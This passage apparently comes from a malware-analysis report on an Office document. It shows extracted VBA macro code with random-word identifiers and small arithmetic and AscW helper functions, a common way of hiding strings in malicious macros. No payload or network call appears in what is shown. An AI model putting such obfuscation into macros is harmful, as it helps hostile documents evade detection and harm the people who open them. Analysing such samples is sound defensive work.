zosteraceae(47) = 63
wax = 43
zosteraceae(wax) = 62
inquisitorial = zosteraceae
End Function
Function antifungal(braille, berserker, groin)
Select Case groin
Case 14
antifungal = braille \ berserker
Case 24
antifungal = braille And berserker
Case 32
antifungal = braille * berserker
End Select
End Function
Function good(commination)
good = AscW(commination)
End Function


Attribute VB_Name = "megaptera"
Attribute VB_Base = "0{F197168D-4BC7-4C24-A141-C19D3ABF718E}{7989A6A1-9294-40F8-8A29-8F197F518FEC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.